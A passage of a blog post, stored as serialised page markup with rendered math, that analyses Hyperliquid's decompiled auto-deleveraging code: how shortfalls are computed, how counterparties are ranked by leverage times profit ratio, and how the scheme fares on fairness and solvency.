position.",{"type":25,"tag":38,"props":1288,"children":1289},{},[1290,1292,1298,1300,1306,1308,1314],{"type":31,"value":1291},"For isolated positions the computation is trivial, and we directly write the single position, with its shortfall, to the ",{"type":25,"tag":82,"props":1293,"children":1295},{"className":1294},[],[1296],{"type":31,"value":1297},"adl_output",{"type":31,"value":1299}," b-tree, which is the output of this transformation for both isolated and cross margin positions, containing both ",{"type":25,"tag":82,"props":1301,"children":1303},{"className":1302},[],[1304],{"type":31,"value":1305},"position_id",{"type":31,"value":1307}," and ",{"type":25,"tag":82,"props":1309,"children":1311},{"className":1310},[],[1312],{"type":31,"value":1313},"position_shortfall",{"type":31,"value":179},{"type":25,"tag":181,"props":1316,"children":1319},{"addr":589,"line-start":1317,"line-end":1318},"2377","2469",[],{"type":25,"tag":38,"props":1321,"children":1322},{},[1323,1325,1331],{"type":31,"value":1324},"Afterwards we can finally loop over the B-tree containing ",{"type":25,"tag":82,"props":1326,"children":1328},{"className":1327},[],[1329],{"type":31,"value":1330},"(position_id, cut)",{"type":31,"value":1332},", which essentially tells us exactly how much of each position needs to be closed, to be later deleveraged from a winning position.",{"type":25,"tag":38,"props":1334,"children":1335},{},[1336,1338,1343],{"type":31,"value":1337},"The final phase of ",{"type":25,"tag":82,"props":1339,"children":1341},{"className":1340},[],[1342],{"type":31,"value":543},{"type":31,"value":1344}," iterates it, and for each key it builds a counterparty array, initially including all users holding positions, sorting them based on a per-asset ADL ranking score.",{"type":25,"tag":181,"props":1346,"children":1349},{"addr":589,"addr-start":1347,"addr-end":1348},"0x555556ac6d52","0x555556ac6de8",[],{"type":25,"tag":38,"props":1351,"children":1352},{},[1353],{"type":31,"value":1354},"How are positions chosen (sorted) to be deleveraged?",{"type":25,"tag":453,"props":1356,"children":1358},{"id":1357},"who-do-we-deleverage",[1359],{"type":31,"value":1360},"Who Do We Deleverage?",{"type":25,"tag":38,"props":1362,"children":1363},{},[1364],{"type":31,"value":1365},"This question is essential to the solvency and fairness of a perp platform. It is clear why solvency is a priority here.",{"type":25,"tag":38,"props":1367,"children":1368},{},[1369],{"type":31,"value":1370},"But what do we mean by fairness? Colloquially, we can say that the relative wealth of accounts should not be affected by deleveraging.",{"type":25,"tag":38,"props":1372,"children":1373},{},[1374,1376,1383],{"type":31,"value":1375},"More formally, fairness can be given multiple related definitions; see ",{"type":25,"tag":162,"props":1377,"children":1380},{"href":1378,"rel":1379},"https://arxiv.org/abs/2512.01112",[166],[1381],{"type":31,"value":1382},"this paper",{"type":31,"value":1384},". We want to prove that the algorithm used in HL is not axiomatically fair in its implementation (as defined in prop. 6.1 of the paper).",{"type":25,"tag":38,"props":1386,"children":1387},{},[1388],{"type":31,"value":1389},"So, is Hyperliquid fair? Is it always solvent?",{"type":25,"tag":26,"props":1391,"children":1393},{"id":1392},"adl-score-computation",[1394],{"type":31,"value":1395},"ADL Score Computation",{"type":25,"tag":38,"props":1397,"children":1398},{},[1399,1401,1407,1409,1415,1417,1422],{"type":31,"value":1400},"The score function at ",{"type":25,"tag":82,"props":1402,"children":1404},{"className":1403},[],[1405],{"type":31,"value":1406},"compute_adl_ranking_score",{"type":31,"value":1408}," is core to answering this question. It's defined, most likely as an ",{"type":25,"tag":82,"props":1410,"children":1412},{"className":1411},[],[1413],{"type":31,"value":1414},"Ord",{"type":31,"value":1416}," implementation on some 20-byte address representation. A ",{"type":25,"tag":82,"props":1418,"children":1420},{"className":1419},[],[1421],{"type":31,"value":906},{"type":31,"value":1423}," of those holds the possible counterparties to fill against, and the trait is used by the sort routines that order them by ranking score for each underwater position.",{"type":25,"tag":38,"props":1425,"children":1426},{},[1427,1429,1434,1436,1442,1444,1451,1453,1460],{"type":31,"value":1428},"Those sort routines are ",{"type":25,"tag":64,"props":1430,"children":1431},{},[1432],{"type":31,"value":1433},"generated by the compiler",{"type":31,"value":1435},": since Rust binaries include a lot of metadata by default in ",{"type":25,"tag":82,"props":1437,"children":1439},{"className":1438},[],[1440],{"type":31,"value":1441},".comment",{"type":31,"value":1443},", we may even manually ",{"type":25,"tag":162,"props":1445,"children":1448},{"href":1446,"rel":1447},"https://github.com/renato-osec/patina-research/tree/main/tools/chela",[166],[1449],{"type":31,"value":1450},"take advantage",{"type":31,"value":1452}," of this to recover the ",{"type":25,"tag":162,"props":1454,"children":1457},{"href":1455,"rel":1456},"https://github.com/rust-lang/rust/blob/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf/library/core/src/slice/sort/stable/mod.rs#L22-L29",[166],[1458],{"type":31,"value":1459},"exact source of library functions",{"type":31,"value":179},{"type":25,"tag":38,"props":1462,"children":1463},{},[1464,1466,1471],{"type":31,"value":1465},"Let's see how this ties back into the ",{"type":25,"tag":82,"props":1467,"children":1469},{"className":1468},[],[1470],{"type":31,"value":543},{"type":31,"value":1472},":",{"type":25,"tag":181,"props":1474,"children":1476},{"source":543,"target":1406,"direction":544,"path":1475},"clearinghouse_adl_orchestrator,driftsort_smallsort_insertion_by_adl_ranking,compute_adl_ranking_score",[],{"type":25,"tag":38,"props":1478,"children":1479},{},[1480],{"type":31,"value":1481},"And here's the main call site used for sorting:",{"type":25,"tag":181,"props":1483,"children":1486},{"addr":589,"line-start":1484,"line-end":1485},"2806","2814",[],{"type":25,"tag":26,"props":1488,"children":1490},{"id":1489},"ratio-1-effective-leverage",[1491],{"type":31,"value":1492},"Ratio 1: Effective Leverage",{"type":25,"tag":206,"props":1494,"children":1495},{},[1496],{"type":25,"tag":82,"props":1497,"children":1499},{"className":1498},[212,213],[1500],{"type":25,"tag":216,"props":1501,"children":1503},{"className":1502},[219],[1504],{"type":25,"tag":216,"props":1505,"children":1507},{"className":1506},[224],[1508],{"type":25,"tag":216,"props":1509,"children":1511},{"className":1510,"ariaHidden":230},[229],[1512,1544],{"type":25,"tag":216,"props":1513,"children":1515},{"className":1514},[235],[1516,1521,1531,1535,1540],{"type":25,"tag":216,"props":1517,"children":1520},{"className":1518,"style":1519},[240],"height:0.8889em;vertical-align:-0.1944em;",[],{"type":25,"tag":216,"props":1522,"children":1524},{"className":1523},[246,31],[1525],{"type":25,"tag":216,"props":1526,"children":1528},{"className":1527},[246],[1529],{"type":31,"value":1530},"effective leverage",{"type":25,"tag":216,"props":1532,"children":1534},{"className":1533,"style":258},[257],[],{"type":25,"tag":216,"props":1536,"children":1538},{"className":1537},[263],[1539],{"type":31,"value":266},{"type":25,"tag":216,"props":1541,"children":1543},{"className":1542,"style":258},[257],[],{"type":25,"tag":216,"props":1545,"children":1547},{"className":1546},[235],[1548,1553],{"type":25,"tag":216,"props":1549,"children":1552},{"className":1550,"style":1551},[240],"height:2.113em;vertical-align:-0.686em;",[],{"type":25,"tag":216,"props":1554,"children":1556},{"className":1555},[246],[1557,1561,1656],{"type":25,"tag":216,"props":1558,"children":1560},{"className":1559},[287,288],[],{"type":25,"tag":216,"props":1562,"children":1564},{"className":1563},[293],[1565],{"type":25,"tag":216,"props":1566,"children":1568},{"className":1567},[298,299],[1569,1644],{"type":25,"tag":216,"props":1570,"children":1572},{"className":1571},[304],[1573,1639],{"type":25,"tag":216,"props":1574,"children":1576},{"className":1575,"style":310},[309],[1577,1598,1609],{"type":25,"tag":216,"props":1578,"children":1579},{"style":314},[1580,1584],{"type":25,"tag":216,"props":1581,"children":1583},{"className":1582,"style":320},[319],[],{"type":25,"tag":216,"props":1585,"children":1587},{"className":1586},[246],[1588],{"type":25,"tag":216,"props":1589,"children":1591},{"className":1590},[246,31],[1592],{"type":25,"tag":216,"props":1593,"children":1595},{"className":1594},[246],[1596],{"type":31,"value":1597},"account value",{"type":25,"tag":216,"props":1599,"children":1600},{"style":360},[1601,1605],{"type":25,"tag":216,"props":1602,"children":1604},{"className":1603,"style":320},[319],[],{"type":25,"tag":216,"props":1606,"children":1608},{"className":1607,"style":370},[369],[],{"type":25,"tag":216,"props":1610,"children":1611},{"style":374},[1612,1616],{"type":25,"tag":216,"props":1613,"children":1615},{"className":1614,"style":320},[319],[],{"type":25,"tag":216,"props":1617,"children":1619},{"className":1618},[246],[1620,1625,1634],{"type":25,"tag":216,"props":1621,"children":1623},{"className":1622},[246],[1624],{"type":31,"value":389},{"type":25,"tag":216,"props":1626,"children":1628},{"className":1627},[246,31],[1629],{"type":25,"tag":216,"props":1630,"children":1632},{"className":1631},[246],[1633],{"type":31,"value":399},{"type":25,"tag":216,"props":1635,"children":1637},{"className":1636},[246],[1638],{"type":31,"value":389},{"type":25,"tag":216,"props":1640,"children":1642},{"className":1641},[408],[1643],{"type":31,"value":411},{"type":25,"tag":216,"props":1645,"children":1647},{"className":1646},[304],[1648],{"type":25,"tag":216,"props":1649,"children":1652},{"className":1650,"style":1651},[309],"height:0.686em;",[1653],{"type":25,"tag":216,"props":1654,"children":1655},{},[],{"type":25,"tag":216,"props":1657,"children":1659},{"className":1658},[427,288],[],{"type":25,"tag":38,"props":1661,"children":1662},{},[1663,1665,1671,1673,1679,1681,1687,1689,1695],{"type":31,"value":1664},"We can see in the decompilation below, through the SIMD noise, that ",{"type":25,"tag":82,"props":1666,"children":1668},{"className":1667},[],[1669],{"type":31,"value":1670},"abs_notional",{"type":31,"value":1672}," (unsigned), and ",{"type":25,"tag":82,"props":1674,"children":1676},{"className":1675},[],[1677],{"type":31,"value":1678},"float.d(rbx)",{"type":31,"value":1680}," is ",{"type":25,"tag":82,"props":1682,"children":1684},{"className":1683},[],[1685],{"type":31,"value":1686},"account_value",{"type":31,"value":1688}," (signed); the division is ",{"type":25,"tag":82,"props":1690,"children":1692},{"className":1691},[],[1693],{"type":31,"value":1694},"abs_notional / account_value",{"type":31,"value":179},{"type":25,"tag":38,"props":1697,"children":1698},{},[1699],{"type":31,"value":1700},"This tells us the risk multiplier that the user took on for this position.",{"type":25,"tag":181,"props":1702,"children":1706},{"addr":1703,"line-start":1704,"line-end":1705},"0x555556abb140","278","296",[],{"type":25,"tag":26,"props":1708,"children":1710},{"id":1709},"ratio-2-profit-ratio",[1711],{"type":31,"value":1712},"Ratio 2: Profit Ratio",{"type":25,"tag":206,"props":1714,"children":1715},{},[1716],{"type":25,"tag":82,"props":1717,"children":1719},{"className":1718},[212,213],[1720],{"type":25,"tag":216,"props":1721,"children":1723},{"className":1722},[219],[1724],{"type":25,"tag":216,"props":1725,"children":1727},{"className":1726},[224],[1728],{"type":25,"tag":216,"props":1729,"children":1731},{"className":1730,"ariaHidden":230},[229],[1732,1763],{"type":25,"tag":216,"props":1733,"children":1735},{"className":1734},[235],[1736,1740,1750,1754,1759],{"type":25,"tag":216,"props":1737,"children":1739},{"className":1738,"style":1519},[240],[],{"type":25,"tag":216,"props":1741,"children":1743},{"className":1742},[246,31],[1744],{"type":25,"tag":216,"props":1745,"children":1747},{"className":1746},[246],[1748],{"type":31,"value":1749},"profit ratio",{"type":25,"tag":216,"props":1751,"children":1753},{"className":1752,"style":258},[257],[],{"type":25,"tag":216,"props":1755,"children":1757},{"className":1756},[263],[1758],{"type":31,"value":266},{"type":25,"tag":216,"props":1760,"children":1762},{"className":1761,"style":258},[257],[],{"type":25,"tag":216,"props":1764,"children":1766},{"className":1765},[235],[1767,1771],{"type":25,"tag":216,"props":1768,"children":1770},{"className":1769,"style":278},[240],[],{"type":25,"tag":216,"props":1772,"children":1774},{"className":1773},[246],[1775,1779,1905],{"type":25,"tag":216,"props":1776,"children":1778},{"className":1777},[287,288],[],{"type":25,"tag":216,"props":1780,"children":1782},{"className":1781},[293],[1783],{"type":25,"tag":216,"props":1784,"children":1786},{"className":1785},[298,299],[1787,1894],{"type":25,"tag":216,"props":1788,"children":1790},{"className":1789},[304],[1791,1889],{"type":25,"tag":216,"props":1792,"children":1794},{"className":1793,"style":310},[309],[1795,1816,1827],{"type":25,"tag":216,"props":1796,"children":1797},{"style":314},[1798,1802],{"type":25,"tag":216,"props":1799,"children":1801},{"className":1800,"style":320},[319],[],{"type":25,"tag":216,"props":1803,"children":1805},{"className":1804},[246],[1806],{"type":25,"tag":216,"props":1807,"children":1809},{"className":1808},[246,31],[1810],{"type":25,"tag":216,"props":1811,"children":1813},{"className":1812},[246],[1814],{"type":31,"value":1815},"entry notional",{"type":25,"tag":216,"props":1817,"children":1818},{"style":360},[1819,1823],{"type":25,"tag":216,"props":1820,"children":1822},{"className":1821,"style":320},[319],[],{"type":25,"tag":216,"props":1824,"children":1826},{"className":1825,"style":370},[369],[],{"type":25,"tag":216,"props":1828,"children":1829},{"style":374},[1830,1834],{"type":25,"tag":216,"props":1831,"children":1833},{"className":1832,"style":320},[319],[],{"type":25,"tag":216,"props":1835,"children":1837},{"className":1836},[246],[1838,1845,1851,1861,1868,1873,1877,1883],{"type":25,"tag":216,"props":1839,"children":1842},{"className":1840},[1841],"mop",[1843],{"type":31,"value":1844},"max",{"type":25,"tag":216,"props":1846,"children":1848},{"className":1847},[287],[1849],{"type":31,"value":1850},"(",{"type":25,"tag":216,"props":1852,"children":1854},{"className":1853},[246,31],[1855],{"type":25,"tag":216,"props":1856,"children":1858},{"className":1857},[246],[1859],{"type":31,"value":1860},"pnl",{"type":25,"tag":216,"props":1862,"children":1865},{"className":1863},[1864],"mpunct",[1866],{"type":31,"value":1867},",",{"type":25,"tag":216,"props":1869,"children":1872},{"className":1870,"style":1871},[257],"margin-right:0.1667em;",[],{"type":25,"tag":216,"props":1874,"children":1876},{"className":1875,"style":1871},[257],[],{"type":25,"tag":216,"props":1878,"children":1880},{"className":1879},[246],[1881],{"type":31,"value":1882},"0",{"type":25,"tag":216,"props":1884,"children":1886},{"className":1885},[427],[1887],{"type":31,"value":1888},")",{"type":25,"tag":216,"props":1890,"children":1892},{"className":1891},[408],[1893],{"type":31,"value":411},{"type":25,"tag":216,"props":1895,"children":1897},{"className":1896},[304],[1898],{"type":25,"tag":216,"props":1899,"children":1901},{"className":1900,"style":419},[309],[1902],{"type":25,"tag":216,"props":1903,"children":1904},{},[],{"type":25,"tag":216,"props":1906,"children":1908},{"className":1907},[427,288],[],{"type":25,"tag":38,"props":1910,"children":1911},{},[1912,1914,1920],{"type":31,"value":1913},"It uses entry notional (",{"type":25,"tag":82,"props":1915,"children":1917},{"className":1916},[],[1918],{"type":31,"value":1919},"r14_2",{"type":31,"value":1921},") as the divisor. PNL is clamped to non-negative before division.",{"type":25,"tag":38,"props":1923,"children":1924},{},[1925],{"type":31,"value":1926},"This basically tells us how well the user's bet went.",{"type":25,"tag":181,"props":1928,"children":1932},{"addr":1929,"addr-start":1930,"addr-end":1931},"0x555556abb76d","0x555556abb8d7","0x555556abb952",[],{"type":25,"tag":38,"props":1934,"children":1935},{},[1936,1938,1944,1946,1952],{"type":31,"value":1937},"There is clamping to avoid rounding issues. Both ratios are clamped to a minimum of ",{"type":25,"tag":82,"props":1939,"children":1941},{"className":1940},[],[1942],{"type":31,"value":1943},"1e-8",{"type":31,"value":1945},", in order not to cancel each other out. The final ADL ranking score is ",{"type":25,"tag":82,"props":1947,"children":1949},{"className":1948},[],[1950],{"type":31,"value":1951},"effective_leverage * profit_ratio",{"type":31,"value":1953},", consistent with both ratio directions and the max clamp on PNL.",{"type":25,"tag":38,"props":1955,"children":1956},{},[1957],{"type":31,"value":1958},"So, in essence, we look for risky and profitable positions!",{"type":25,"tag":606,"props":1960,"children":1962},{"id":1961},"partial-and-total-adl",[1963],{"type":31,"value":1964},"Partial and Total ADL",{"type":25,"tag":38,"props":1966,"children":1967},{},[1968],{"type":31,"value":1969},"Finally, note that deleveraging can also be partial, but even then it goes by the order defined by this score.",{"type":25,"tag":38,"props":1971,"children":1972},{},[1973],{"type":31,"value":1974},"Here, we fork based on whether ADL is total or not, closing the position in the former case.",{"type":25,"tag":38,"props":1976,"children":1977},{},[1978,1980,1985],{"type":31,"value":1979},"So essentially, in pseudocode, the whole latter part of ",{"type":25,"tag":82,"props":1981,"children":1983},{"className":1982},[],[1984],{"type":31,"value":543},{"type":31,"value":1986}," boils down to:",{"type":25,"tag":181,"props":1988,"children":1991},{"addr":589,"line-start":1989,"line-end":1990},"3252","3632",[],{"type":25,"tag":38,"props":1993,"children":1994},{},[1995],{"type":31,"value":1996},"Note that fill.pos_szi is the full position size of the insolvent user, not just the position shortfall. This is key to understanding the financial implications of ADL.",{"type":25,"tag":453,"props":1998,"children":2000},{"id":1999},"branches",[2001],{"type":31,"value":2002},"Branches",{"type":25,"tag":38,"props":2004,"children":2005},{},[2006],{"type":31,"value":2007},"There is still much to be explored here: we could try to take a leap forward and conjecture some financial conclusions from what we've learned so far, or we could take a step back and do some introspection on the tools that made this all possible.",{"type":25,"tag":38,"props":2009,"children":2010},{},[2011],{"type":31,"value":2012},"Given the polar opposite direction of those two ends, the author has decided to let the reader choose their own adventure:",{"type":25,"tag":453,"props":2014,"children":2016},{"id":2015},"financial-conclusions",[2017],{"type":31,"value":2018},"Financial Conclusions",{"type":25,"tag":26,"props":2020,"children":2022},{"id":2021},"fairness-revenue-solvency-trilemma",[2023],{"type":31,"value":2024},"Fairness, Revenue, Solvency Trilemma",{"type":25,"tag":38,"props":2026,"children":2027},{},[2028,2030,2036],{"type":31,"value":2029},"Aligning with the trilemma proposed in §2.1, prop. 2.5 of ",{"type":25,"tag":162,"props":2031,"children":2033},{"href":1378,"rel":2032},[166],[2034],{"type":31,"value":2035},"the paper mentioned before",{"type":31,"value":2037},", let's try to quantify a concrete estimate for each axis of the trilemma:",{"type":25,"tag":2039,"props":2040,"children":2041},"ul",{},[2042,2053,2063],{"type":25,"tag":2043,"props":2044,"children":2045},"li",{},[2046,2051],{"type":25,"tag":64,"props":2047,"children":2048},{},[2049],{"type":31,"value":2050},"Solvency",{"type":31,"value":2052},": can the platform pay every trader out?",{"type":25,"tag":2043,"props":2054,"children":2055},{},[2056,2061],{"type":25,"tag":64,"props":2057,"children":2058},{},[2059],{"type":31,"value":2060},"Fairness",{"type":31,"value":2062},": we will use the axiomatic fairness definition per prop. 3.4.",{"type":25,"tag":2043,"props":2064,"children":2065},{},[2066,2071],{"type":25,"tag":64,"props":2067,"children":2068},{},[2069],{"type":31,"value":2070},"Revenue",{"type":31,"value":2072},": the fraction of total winner PNL that survives after deleveraging.",{"type":25,"tag":38,"props":2074,"children":2075},{},[2076],{"type":31,"value":2077},"Let's borrow these definitions from the paper:",{"type":25,"tag":206,"props":2079,"children":2080},{},[2081],{"type":25,"tag":82,"props":2082,"children":2084},{"className":2083},[212,213],[2085],{"type":25,"tag":216,"props":2086,"children":2088},{"className":2087},[219],[2089],{"type":25,"tag":216,"props":2090,"children":2092},{"className":2091},[224],[2093],{"type":25,"tag":216,"props":2094,"children":2096},{"className":2095,"ariaHidden":230},[229],[2097],{"type":25,"tag":216,"props":2098,"children":2100},{"className":2099},[235],[2101,2106],{"type":25,"tag":216,"props":2102,"children":2105},{"className":2103,"style":2104},[240],"height:23.1785em;vertical-align:-11.3392em;",[],{"type":25,"tag":216,"props":2107,"children":2109},{"className":2108},[246],[2110],{"type":25,"tag":216,"props":2111,"children":2113},{"className":2112},[954],[2114,2968],{"type":25,"tag":216,"props":2115,"children":2117},{"className":2116},[959],[2118],{"type":25,"tag":216,"props":2119,"children":2121},{"className":2120},[298,299],[2122,2956],{"type":25,"tag":216,"props":2123,"children":2125},{"className":2124},[304],[2126,2951],{"type":25,"tag":216,"props":2127,"children":2130},{"className":2128,"style":2129},[309],"height:11.8392em;",[2131,2214,2233,2306,2378,2448,2520,2590,2660,2733,2805,2877],{"type":25,"tag":216,"props":2132,"children":2134},{"style":2133},"top:-14.3707em;",[2135,2140],{"type":25,"tag":216,"props":2136,"children":2139},{"className":2137,"style":2138},[319],"height:3.3714em;",[],{"type":25,"tag":216,"props":2141,"children":2143},{"className":2142},[246],[2144],{"type":25,"tag":216,"props":2145,"children":2147},{"className":2146},[246],[2148,2156],{"type":25,"tag":216,"props":2149,"children":2153},{"className":2150,"style":2152},[246,2151],"mathnormal","margin-right:0.13889em;",[2154],{"type":31,"value":2155},"P",{"type":25,"tag":216,"props":2157,"children":2160},{"className":2158},[2159],"msupsub",[2161],{"type":25,"tag":216,"props":2162,"children":2164},{"className":2163},[298,299],[2165,2202],{"type":25,"tag":216,"props":2166,"children":2168},{"className":2167},[304],[2169,2197],{"type":25,"tag":216,"props":2170,"children":2173},{"className":2171,"style":2172},[309],"height:0.1514em;",[2174],{"type":25,"tag":216,"props":2175,"children":2177},{"style":2176},"top:-2.55em;margin-left:-0.1389em;margin-right:0.05em;",[2178,2183],{"type":25,"tag":216,"props":2179,"children":2182},{"className":2180,"style":2181},[319],"height:2.7em;",[],{"type":25,"tag":216,"props":2184,"children":2190},{"className":2185},[2186,2187,2188,2189],"sizing","reset-size6","size3","mtight",[2191],{"type":25,"tag":216,"props":2192,"children":2194},{"className":2193},[246,2151,2189],[2195],{"type":31,"value":2196},"n",{"type":25,"tag":216,"props":2198,"children":2200},{"className":2199},[408],[2201],{"type":31,"value":411},{"type":25,"tag":216,"props":2203,"children":2205},{"className":2204},[304],[2206],{"type":25,"tag":216,"props":2207,"children":2210},{"className":2208,"style":2209},[309],"height:0.15em;",[2211],{"type":25,"tag":216,"props":2212,"children":2213},{},[],{"type":25,"tag":216,"props":2215,"children":2217},{"style":2216},"top:-12.8707em;",[2218,2222],{"type":25,"tag":216,"props":2219,"children":2221},{"className":2220,"style":2138},[319],[],{"type":25,"tag":216,"props":2223,"children":2225},{"className":2224},[246],[2226],{"type":25,"tag":216,"props":2227,"children":2230},{"className":2228,"style":2229},[246,2151],"margin-right:0.07847em;",[2231],{"type":31,"value":2232},"I",{"type":25,"tag":216,"props":2234,"children":2236},{"style":2235},"top:-10.8392em;",[2237,2241],{"type":25,"tag":216,"props":2238,"children":2240},{"className":2239,"style":2138},[319],[],{"type":25,"tag":216,"props":2242,"children":2244},{"className":2243},[246],[2245],{"type":25,"tag":216,"props":2246,"children":2248},{"className":2247},[246],[2249,2255],{"type":25,"tag":216,"props":2250,"children":2252},{"className":2251},[246,2151],[2253],{"type":31,"value":2254},"c",{"type":25,"tag":216,"props":2256,"children":2258},{"className":2257},[2159],[2259],{"type":25,"tag":216,"props":2260,"children":2262},{"className":2261},[298,299],[2263,2295],{"type":25,"tag":216,"props":2264,"children":2266},{"className":2265},[304],[2267,2290],{"type":25,"tag":216,"props":2268,"children":2271},{"className":2269,"style":2270},[309],"height:0.3117em;",[2272],{"type":25,"tag":216,"props":2273,"children":2275},{"style":2274},"top:-2.55em;margin-left:0em;margin-right:0.05em;",[2276,2280],{"type":25,"tag":216,"props":2277,"children":2279},{"className":2278,"style":2181},[319],[],{"type":25,"tag":216,"props":2281,"children":2283},{"className":2282},[2186,2187,2188,2189],[2284],{"type":25,"tag":216,"props":2285,"children":2287},{"className":2286},[246,2151,2189],[2288],{"type":31,"value":2289},"i",{"type":25,"tag":216,"props":2291,"children":2293},{"className":2292},[408],[2294],{"type":31,"value":411},{"type":25,"tag":216,"props":2296,"children":2298},{"className":2297},[304],[2299],{"type":25,"tag":216,"props":2300,"children":2302},{"className":2301,"style":2209},[309],[2303],{"type":25,"tag":216,"props":2304,"children":2305},{},[],{"type":25,"tag":216,"props":2307,"children":2309},{"style":2308},"top:-8.8188em;",[2310,2314],{"type":25,"tag":216,"props":2311,"children":2313},{"className":2312,"style":2138},[319],[],{"type":25,"tag":216,"props":2315,"children":2317},{"className":2316},[246],[2318],{"type":25,"tag":216,"props":2319,"children":2321},{"className":2320},[246],[2322,2329],{"type":25,"tag":216,"props":2323,"children":2326},{"className":2324,"style":2325},[246,2151],"margin-right:0.03588em;",[2327],{"type":31,"value":2328},"π",{"type":25,"tag":216,"props":2330,"children":2332},{"className":2331},[2159],[2333],{"type":25,"tag":216,"props":2334,"children":2336},{"className":2335},[298,299],[2337,2367],{"type":25,"tag":216,"props":2338,"children":2340},{"className":2339},[304],[2341,2362],{"type":25,"tag":216,"props":2342,"children":2344},{"className":2343,"style":2270},[309],[2345],{"type":25,"tag":216,"props":2346,"children":2348},{"style":2347},"top:-2.55em;margin-left:-0.0359em;margin-right:0.05em;",[2349,2353],{"type":25,"tag":216,"props":2350,"children":2352},{"className":2351,"style":2181},[319],[],{"type":25,"tag":216,"props":2354,"children":2356},{"className":2355},[2186,2187,2188,2189],[2357],{"type":25,"tag":216,"props":2358,"children":2360},{"className":2359},[246,2151,2189],[2361],{"type":31,"value":2289},{"type":25,"tag":216,"props":2363,"children":2365},{"className":2364},[408],[2366],{"type":31,"value":411},{"type":25,"tag":216,"props":2368,"children":2370},{"className":2369},[304],[2371],{"type":25,"tag":216,"props":2372,"children":2374},{"className":2373,"style":2209},[309],[2375],{"type":25,"tag":216,"props":2376,"children":2377},{},[],{"type":25,"tag":216,"props":2379,"children":2381},{"style":2380},"top:-7.3188em;",[2382,2386],{"type":25,"tag":216,"props":2383,"children":2385},{"className":2384,"style":2138},[319],[],{"type":25,"tag":216,"props":2387,"children":2389},{"className":2388},[246],[2390],{"type":25,"tag":216,"props":2391,"children":2393},{"className":2392},[246],[2394,2400],{"type":25,"tag":216,"props":2395,"children":2397},{"className":2396},[246,2151],[2398],{"type":31,"value":2399},"e",{"type":25,"tag":216,"props":2401,"children":2403},{"className":2402},[2159],[2404],{"type":25,"tag":216,"props":2405,"children":2407},{"className":2406},[298,299],[2408,2437],{"type":25,"tag":216,"props":2409,"children":2411},{"className":2410},[304],[2412,2432],{"type":25,"tag":216,"props":2413,"children":2415},{"className":2414,"style":2270},[309],[2416],{"type":25,"tag":216,"props":2417,"children":2418},{"style":2274},[2419,2423],{"type":25,"tag":216,"props":2420,"children":2422},{"className":2421,"style":2181},[319],[],{"type":25,"tag":216,"props":2424,"children":2426},{"className":2425},[2186,2187,2188,2189],[2427],{"type":25,"tag":216,"props":2428,"children":2430},{"className":2429},[246,2151,2189],[2431],{"type":31,"value":2289},{"type":25,"tag":216,"props":2433,"children":2435},{"className":2434},[408],[2436],{"type":31,"value":411},{"type":25,"tag":216,"props":2438,"children":2440},{"className":2439},[304],[2441],{"type":25,"tag":216,"props":2442,"children":2444},{"className":2443,"style":2209},[309],[2445],{"type":25,"tag":216,"props":2446,"children":2447},{},[],{"type":25,"tag":216,"props":2449,"children":2451},{"style":2450},"top:-5.8188em;",[2452,2456],{"type":25,"tag":216,"props":2453,"children":2455},{"className":2454,"style":2138},[319],[],{"type":25,"tag":216,"props":2457,"children":2459},{"className":2458},[246],[2460],{"type":25,"tag":216,"props":2461,"children":2463},{"className":2462},[246],[2464,2471],{"type":25,"tag":216,"props":2465,"children":2468},{"className":2466,"style":2467},[246,2151],"margin-right:0.02691em;",[2469],{"type":31,"value":2470},"w",{"type":25,"tag":216,"props":2472,"children":2474},{"className":2473},[2159],[2475],{"type":25,"tag":216,"props":2476,"children":2478},{"className":2477},[298,299],[2479,2509],{"type":25,"tag":216,"props":2480,"children":2482},{"className":2481},[304],[2483,2504],{"type":25,"tag":216,"props":2484,"children":2486},{"className":2485,"style":2270},[309],[2487],{"type":25,"tag":216,"props":2488,"children":2490},{"style":2489},"top:-2.55em;margin-left:-0.0269em;margin-right:0.05em;",[2491,2495],{"type":25,"tag":216,"props":2492,"children":2494},{"className":2493,"style":2181},[319],[],{"type":25,"tag":216,"props":2496,"children":2498},{"className":2497},[2186,2187,2188,2189],[2499],{"type":25,"tag":216,"props":2500,"children":2502},{"className":2501},[246,2151,2189],[2503],{"type":31,"value":2289},{"type":25,"tag":216,"props":2505,"children":2507},{"className":2506},[408],[2508],{"type":31,"value":411},{"type":25,"tag":216,"props":2510,"children":2512},{"className":2511},[304],[2513],{"type":25,"tag":216,"props":2514,"children":2516},{"className":2515,"style":2209},[309],[2517],{"type":25,"tag":216,"props":2518,"children":2519},{},[],{"type":25,"tag":216,"props":2521,"children":2523},{"style":2522},"top:-4.3188em;",[2524,2528],{"type":25,"tag":216,"props":2525,"children":2527},{"className":2526,"style":2138},[319],[],{"type":25,"tag":216,"props":2529,"children":2531},{"className":2530},[246],[2532],{"type":25,"tag":216,"props":2533,"children":2535},{"className":2534},[246],[2536,2542],{"type":25,"tag":216,"props":2537,"children":2539},{"className":2538},[246,2151],[2540],{"type":31,"value":2541},"x",{"type":25,"tag":216,"props":2543,"children":2545},{"className":2544},[2159],[2546],{"type":25,"tag":216,"props":2547,"children":2549},{"className":2548},[298,299],[2550,2579],{"type":25,"tag":216,"props":2551,"children":2553},{"className":2552},[304],[2554,2574],{"type":25,"tag":216,"props":2555,"children":2557},{"className":2556,"style":2270},[309],[2558],{"type":25,"tag":216,"props":2559,"children":2560},{"style":2274},[2561,2565],{"type":25,"tag":216,"props":2562,"children":2564},{"className":2563,"style":2181},[319],[],{"type":25,"tag":216,"props":2566,"children":2568},{"className":2567},[2186,2187,2188,2189],[2569],{"type":25,"tag":216,"props":2570,"children":2572},{"className":2571},[246,2151,2189],[2573],{"type":31,"value":2289},{"type":25,"tag":216,"props":2575,"children":2577},{"className":2576},[408],[2578],{"type":31,"value":411},{"type":25,"tag":216,"props":2580,"children":2582},{"className":2581},[304],[2583],{"type":25,"tag":216,"props":2584,"children":2586},{"className":2585,"style":2209},[309],[2587],{"type":25,"tag":216,"props":2588,"children":2589},{},[],{"type":25,"tag":216,"props":2591,"children":2593},{"style":2592},"top:-2.5512em;",[2594,2598],{"type":25,"tag":216,"props":2595,"children":2597},{"className":2596,"style":2138},[319],[],{"type":25,"tag":216,"props":2599,"children":2601},{"className":2600},[246],[2602],{"type":25,"tag":216,"props":2603,"children":2605},{"className":2604},[246],[2606,2612],{"type":25,"tag":216,"props":2607,"children":2609},{"className":2608},[246,2151],[2610],{"type":31,"value":2611},"h",{"type":25,"tag":216,"props":2613,"children":2615},{"className":2614},[2159],[2616],{"type":25,"tag":216,"props":2617,"children":2619},{"className":2618},[298,299],[2620,2649],{"type":25,"tag":216,"props":2621,"children":2623},{